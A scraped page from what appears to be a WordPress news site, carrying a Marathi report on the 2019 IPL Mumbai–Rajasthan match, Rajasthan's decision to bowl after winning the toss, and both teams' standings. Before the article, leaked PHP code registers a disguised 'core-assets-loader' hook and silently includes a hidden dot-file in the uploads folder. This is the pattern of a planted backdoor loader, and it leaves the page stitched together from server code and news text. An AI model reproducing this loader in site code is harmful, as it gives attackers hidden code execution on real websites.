add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); आयपीएल 2019 | मुंबई विरुद्ध राजस्थान | टॉस जिंकून राजस्थानचा बॉलिंगचा निर्णय – SOCH INDIA
Menu

खेल
आयपीएल 2019 | मुंबई विरुद्ध राजस्थान | टॉस जिंकून राजस्थानचा बॉलिंगचा निर्णय

nobanner

सलगपणे तीन मॅच जिंकणाऱ्या मुंबई विरुद्ध राजस्थान यांच्यात वानखेडे स्टेडियममध्ये मॅचला सुरुवात झाली आहे. राजस्थानने टॉस जिंकून बॉलिंग करण्याचा निर्णय घेतला आहे. त्यामुळे मुंबई पहिल्यांदा बॅटिंग करणार आहे.

मुंबईने पंजाब विरुद्ध झालेल्या शेवटच्या मॅचमध्ये मुंबईने पंजाबचा अखेरच्या बॉलवर पराभव केला होता. यामॅचमध्ये किरॉन पोलार्डने ३० बॉलमध्ये स्फोटक ८३ रनची खेळी केली होती. तर शेवटच्या काही बॉलमध्ये अल्झारी जोसेफने निर्णायक क्षणी मैदानात येत मुंबईला विजय मिळवून दिला होता. त्यामुळे मुंबईच्या विश्वास नक्कीच दुणावला असेल. राजस्थान विरुद्ध होणाऱ्या आजच्या मॅचमध्ये विजय मिळवून आपली विजयी घौडदोड अशीच कायम ठेवण्याचा प्रयत्न मुंबईचा असणार आहे.

राजस्थानचा गेल्या मॅचमध्ये चेन्नई विरुद्ध अखेरच्या बॉलवर पराभव झाला. राजस्थानने आतापर्यंचत ६ मॅचमध्ये केवळ एकामॅचमध्येच विजय मिळवता आला आहे. त्यामुळे मुंबई विरुद्ध होणाऱ्या मॅचमध्ये राजस्थानचा विजय मिळवण्याचा प्रयत्न असणार आहे. प्ले ऑफ मध्ये पोहचण्यासाठी राजस्थानला आता मॅच जिंकणे गरजेचे होणार आहे. राजस्थान अंकतालिकेत 2 पॉईंटसह सातव्या क्रमांकावर आहे. तर मुंबई 8 पॉईंट मिळवून तिसऱ्या क्रमांकावर आहे.